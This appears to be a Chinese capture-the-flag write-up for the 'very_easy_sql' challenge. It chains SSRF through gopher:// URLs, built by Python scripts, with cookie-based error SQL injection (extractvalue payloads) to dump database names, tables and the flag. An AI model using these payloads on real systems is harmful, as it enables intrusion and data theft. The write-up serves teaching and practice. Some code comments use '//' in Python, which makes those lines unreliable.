web:very_easy_sql(sql、ssrf、gopher协议sql注入)

题目

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第1张图片

页面显示如下

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第2张图片

显示不是内部用户,无法识别信息

查看源码,找到一个use.php

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第3张图片

访问之后显示如下

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第4张图片

随便输入了一个,发现url有参数显示

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第5张图片

试一下靶机的网址,返回nonono

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第6张图片

联系之前原始页面写的“不是内网用户,无法别识身份”

这里没有rce、越权、文件包含等。那么很有可能有ssrf。

这里要用到gopher协议与ssrf结合使用

内网访问,gopher的请求语句host要改成localhost:80或者127.0.0.1:80

构造poc

import urllib.parse //导入库 urllib.parse,用于url解析与转码

host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)

test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host,content_length,content)

tmp = urllib.parse.quote(test) //以内网地址,post方式访问flag.php网址
new = tmp.replace("%0A","%0D%0A") //crlf注入漏洞
result = urllib.parse.quote(new) //增加gopher://127.0.0.1:80/,编码
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第7张图片

用bp抓包修改信息后,显示如下

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第8张图片

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第9张图片

把这个set-cookie解码出来为

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第10张图片

解码结果为admin,cookie为注入点

解法一

测试为字符型还是整数型注入

构造poc为

import urllib.parse

host = "127.0.0.1:80"
cookie="this_is_your_cookie=YWRtaW4nICM="

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test) 
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new) 
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第11张图片

通过报错信息,可以找到闭合点,有报错信息,直接使用报错注入

构造payload,检查是否可以进行报错注入

admin') and extractvalue(1, concat(0x7e, (select @@version),0x7e)) #

改写成gopher的形式

import urllib.parse
import base64
host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, (select @@version),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie="this_is_your_cookie="+base64_payload

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第12张图片数据库信息被回显出来了,报错信息可以使用,按正常的步骤走

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第13张图片

查数据库

admin') and extractvalue(1, concat(0x7e, (select database()),0x7e)) #
import urllib.parse
import base64
host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, (select database()),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie="this_is_your_cookie="+base64_payload

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第14张图片

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第15张图片

数据库名为security

查表

构造payload为

admin') and extractvalue(1, concat(0x7e, (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='security'),0x7e)) #
import urllib.parse
import base64
host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='security'),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie="this_is_your_cookie="+base64_payload

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第16张图片

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第17张图片

看到有个flag表

查列名

admin') and extractvalue(1, concat(0x7e, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag'),0x7e)) #
import urllib.parse
import base64
host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag'),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie="this_is_your_cookie="+base64_payload

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第18张图片

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第19张图片

查到flag表里只有一个flag列

查内容

admin') and extractvalue(1, concat(0x7e, (SELECT flag from flag),0x7e)) #
import urllib.parse
import base64
host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, (SELECT flag from flag),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie="this_is_your_cookie="+base64_payload

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第20张图片

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第21张图片

查到flag,但是显示不全,需要用substr函数进行分割读取:

admin') and extractvalue(1, concat(0x7e, substr((SELECT flag from flag),30,32),0x7e)) #
import urllib.parse
import base64
host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, substr((SELECT flag from flag),30,32),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie="this_is_your_cookie="+base64_payload

test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第22张图片

回显另一半flag

web:very_easy_sql(sql、ssrf、gopher协议sql注入)_第23张图片

参考文章链接

gopher协议的利用 - FreeBuf网络安全行业门户

Gopher协议-CSDN博客

解法一:攻防世界web新手 - very_easy_sql(非常详细的wp)_sean7777777的博客-CSDN博客

解法二:攻防世界 -- very_easy_sql-CSDN博客

你可能感兴趣的:(CTF-web,sql注入,sql,数据库,网络安全,web安全)